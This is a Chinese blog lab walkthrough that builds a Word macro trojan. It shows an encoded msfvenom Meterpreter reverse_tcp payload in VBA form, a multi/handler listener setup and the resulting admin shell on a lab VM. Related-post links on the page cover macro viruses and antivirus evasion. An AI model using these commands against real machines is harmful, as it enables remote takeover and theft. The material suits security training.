利用word漏洞制作Windows反弹木马

最新推荐文章于 2022-06-14 14:44:27 发布
最新推荐文章于 2022-06-14 14:44:27 发布
阅读量1.2k 收藏 20
点赞数
分类专栏: 渗透测试 文章标签: kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxy123_com/article/details/116489953
版权

实验环境:Windows虚拟机一台IP地址为192.168.230.4,需安装office,kali Linux虚拟机一台,IP地址192.168.230.10
实验目的:拿下Windows控制权
实验步骤:
一,部署实验环境
1,Windows安装word,配置IP地址
在这里插入图片描述二,使用kali生成payload
1,打开msf生成payload
命令行输入msfconsole也可以打开
在这里插入图片描述

msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.10 LPORT=4444 -a x86 --platform windows-e x86/shikata_ga_nai -i 5 -f vba-exe    生成payload,-p指定payload,LHOST指定本机IP地址作为监听,LPORT为本机监听端口,-a架构 x86架构,--platform平台为Windows,-e指定编码器

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述打开宏文件
在这里插入图片描述另存为反弹木马
在这里插入图片描述2,进行监听

msf6 > use exploit/multi/handler     
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp   设置payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.230.10    设置监听IP地址
LHOST => 192.168.230.10
msf6 exploit(multi/handler) > set LPORT 4444     监听端口
LPORT => 4444
msf6 exploit(multi/handler) > run   运行监听器

在这里插入图片描述在这里插入图片描述在这里插入图片描述获取到shell
meterpreter > getuid 查看当前用户,已经获取到管理员权限
Server username: DESKTOP-QU8DCA3\admin
在这里插入图片描述
【至此,实验完成】

连某人
关注
  • 0
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali生成windows木马程序
qq_51950323的博客
09-07 9669
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
一个Word无形中控制你的电脑
小刚的博客
09-21 1085
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Word宏添加木马病毒前言创建木马word1.生成木马代码2.创建word文件3.打开msf监听注意==本文只是普及防木马和信息防御教学,切勿用于其他用途。== 前言 我们知道windows和inux的软件等等很容易被植入木马或者病毒。 但你们知道word和excel文件依旧可以植入木马吗? office有个功能叫做宏,通常情况下是关闭状态,当有宏操作时候会提示你已经禁止了宏,问你咋整 这情况普.
Windows搭建漏洞环境
weixin_34082695的博客
06-13 1239
Windows搭建漏洞环境 这里涉及到WAMP、DVWA、XSS、sqli-labs 实验环境 windows主机 没了,不需要什么环境 今天干的就是搭建环境 啥是WAMP? WAMP是windows中Apache、MySQL和PHP环境 缩写为WAMP 搭建WAMP 首先我们需要先下载一个WAMP,这里有官网可以直接去官网下载 官网地址进入官网以后点击Download 点击对应版本下的cha...
【安全健行】(6):Windows漏洞保护机制
weixin_33806509的博客
05-21 429
2015/5/21 11:07:55之前我们一直在Linux平台上分析漏洞,那是因为对于绝大多数Hacker获得一个Linux平台更加容易,而且主流的服务器系统基本也都是Linux/Unix的;另外一个好处就是Linux提供了用户自定义的强大功能,我们可以根据需要编译汇编程序代码,关闭相应的安全保护机制,便于我们的研究学习。然而现实中有影响力的漏洞大多是基于Windows系统...
office宏病毒反弹shell实验
AFCC_的博客(Web_Dog)
12-10 1093
0x00 什么是宏病毒 宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒的word文档时,嵌入其中的宏代码会自动运行 Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。 AutoExec:启动 Word 或加载全局模板时 AutoNew:每次新建文档时 AutoOpen:每次打开已有文档时 ...
漏洞利用木马.pdf
04-18
漏洞利用木马:缓冲区溢出漏洞利用,数据库漏洞利用(MySQL)......
反弹木马工具
07-31
反弹木马,渗透神器,用作网络攻防练习使用,建议放入虚拟机安装
89-89.渗透测试-通过木马反弹shell(Android).mp4
最新发布
05-10
89-89.渗透测试-通过木马反弹shell(Android).mp4
91-91.渗透测试-通过木马反弹shell(Linux).mp4
05-10
91-91.渗透测试-通过木马反弹shell(Linux).mp4
一键Windows木马插件 清理工具
09-22
有效防止木马与恶意软件变名藏匿 独创清理技术,清理能力远远高于同类软件 安全稳定 脚本库即时更新,查杀能力与时俱进 随时上网获取支持 自由定制 支持多语言环境 用户自由做主是否清理 外部工具及软件的支持
Windows 漏洞利用开发
dengdouweng1282的博客
06-09 596
第一阶段:简单栈溢出 分析栈溢出原理 寻找溢出点,了解pattern_create和pattern_offset计算溢出点的原理 寻找JMP ESP跳板,分析利用JMP ESP跳板劫持程序流的原理 编写漏洞利用脚本,自动化攻击 第二阶段:利用SEH绕过GS保护 了解GS编译选项,SHE异常处理机制 分析利用SHE异常处理机制绕过GS的原理 寻找溢出...
metasploit-学习8--显示exploit的模块的所有exploit信息
热门推荐
简单就是美
06-19 2万+
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    -----------    aix/rpc_cmsd_opcod
编写WORD木马
I'm a hack----
10-03 2767
编写Word木马的ShellCode2008-04-25 08:16 P.M.曹军分析了导致去年“万珍”病毒的Word 2000溢出漏洞细节,但并没涉及漏洞的具体利用;第4期文章中,黑防讨论了生成WMF木马的ShellCode的设计与实现。由于自身的特点,Word木马的设计与前者有较大的区别,下面由我对此进行一下分析。 预备知识 讨论ShellCode之前,我们需要掌握几个预备知识: 1.诸如Do
Kali渗透测试:使用Word宏病毒进行渗透攻击
Liu_Bruce的博客
05-14 4361
Kali渗透测试:使用宏病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。 构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或
Kali学习 | 漏洞利用:4.10 PDF文件攻击
qq_43233085的博客
01-12 1752
Kali学习 | 漏洞利用:4.10 PDF文件攻击 PDF介绍操作步骤 PDF介绍 PDF是一种文件格式,该文件的使用比较广泛,并且容易传输。 通常在工作中,用户都是从工作程序中打开了一个合法的PDF文档。 当打开该文档时,该用户的主机就有可能被攻击。 Metasploit提供了一个渗透攻击模块,可以来创建一个攻击载荷,通过传递该攻击载荷对目标系统进行渗透攻击。 操作步骤 (1)启动MSFCON...
利用msfvenom制作windows木马及免杀
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
MSF利用宏病毒感染word文档获取shell复现
永远是少年
06-14 2115
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。 一、环境准备 二、宏文档生成 三、效果检验
Windows网络服务渗透测试实战-MSF恶意程序利用
c_lanxiaofang的博客
05-20 4119
一、实验项目名称 Windows网络服务渗透测试实战-MSF恶意程序利用 二、实验目的及要求 掌握对MSF恶意程序利用的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 对安卓msf上线进行图标隐藏,pc上线自行进行操作截图 一、Android端 1、查看kali的IP 192.168.43.89 2、生成一个apk文件到桌面 命令中的lhost为kali系统的IP,lport为监听端口,此处设置9988 msfvenom -p and.
kali->使用Metaspoit制作木马
底层社会中的弱智
07-28 1万+
首先,我们要先知道木马的使用过程,然后我们才能制作木马 木马:控制端(我们) 被控制端(倒霉蛋们) 虚拟机的kali 打开终端 使用msfvenom -p命令来制作(因为我用的是kali2.0所以和1.0的版本不一样) msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192
Windows操作系统安全设计论文.doc
11-28
Windows操作系统安全设计论文.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值